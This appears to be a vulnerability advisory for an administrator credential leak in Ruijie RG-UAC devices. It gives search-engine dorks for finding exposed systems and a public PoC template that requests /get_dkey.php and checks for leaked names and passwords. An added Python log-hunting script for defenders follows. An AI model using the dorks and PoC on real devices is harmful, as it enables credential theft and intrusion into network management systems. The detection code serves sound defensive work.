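ruijie-rg-uac-account-password-leakage: Ruijie RG-UAC administrator account password leakage

Date: 2025-09-01 | Affected software: ruijie rg uac | POC: public

Vulnerability description

The Ruijie RG-UAC unified internet behavior management and audit system has an account and password information disclosure issue. The leaked user account and password information can indirectly be used to log in to the management backend.

Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
Hunter: app.name="Ruijie 锐捷 RG-UAC"
Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"

PoC code [public]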

id: ruijie-rg-uac-account-password-leakage

info:
  name: 锐捷RG-UAC存在管理账号密码泄露
  author: Y3y1ng
  severity: MEDIUM
  verified: true
  description: |-
    锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台。
    Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
    Hunter: app.name="Ruijie 锐捷 RG-UAC"
    Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"
  reference:
    - https://mp.weixin.qq.com/s/rsDCydIJd1gNvXBFKdWeHw
  tags: ruijie,password,leakage
  created: 2023/12/10

rules:
  r0:
    request:
      method: GET
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'get_dkey_passwd(user)') &&
      response.body.bcontains(b'"name":') &&
      response.body.bcontains(b'"password":')
  r1:
    request:
      method: GET
      path: /get_dkey.php
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'get_dkey_passwd(user)') &&
      response.body.bcontains(b'"name":') &&
      response.body.bcontains(b'"password":')
expression: r0() || r1()
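
For defenders, the request in rule r1 can be hunted for in HTTP access logs. The following is an added example, not part of the original PoC or any Ruijie tooling: it assumes a proxy or WAF in front of the device writes Combined Log Format, and the sample log lines and helper names are constructed for illustration.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Path requested by rule r1 of the PoC on this page.
SENSITIVE_PATH = "/get_dkey.php"

# Assumption: Combined Log Format, as written by a proxy/WAF in front of the device.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Sep/2025:10:00:01 +0800] "GET /get_dkey.php HTTP/1.1" 200 412 "-" "curl/8.0"
198.51.100.7 - - [01/Sep/2025:10:00:05 +0800] "GET / HTTP/1.1" 200 88 "-" "curl/8.0"
203.0.113.9 - - [01/Sep/2025:10:02:11 +0800] "GET /%67et_dkey.php?x=1 HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.20 - - [01/Sep/2025:10:03:40 +0800] "GET //get_dkey.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"
192.0.2.4 - - [01/Sep/2025:10:04:00 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def normalize(target):
    """Drop the query string, percent-decode, collapse slashes and dot segments, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return "/" + posixpath.normpath(path).lstrip("/").lower()


def find_hits(log_text):
    """Return {client_ip: [(timestamp, status, answered_200), ...]} for the sensitive path."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        # Variants (encoding, case, extra slashes) are flagged too; whether the
        # device serves them is not stated on the page, so this errs on the side of alerting.
        if not m or normalize(m["target"]) != SENSITIVE_PATH:
            continue
        # Status 200 matches the PoC's success condition; other codes are failed probes.
        hits[m["ip"]].append((m["ts"], int(m["status"]), m["status"] == "200"))
    return dict(hits)


if __name__ == "__main__":
    for ip, events in find_hits(SAMPLE_LOG).items():
        for ts, status, answered in events:
            print(f"{ip} {ts} status={status} {'RESPONDED' if answered else 'probe'}")
```

Any client flagged with a 200 response should be treated as having potentially read the management credentials, so rotate them and review subsequent logins from that address.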
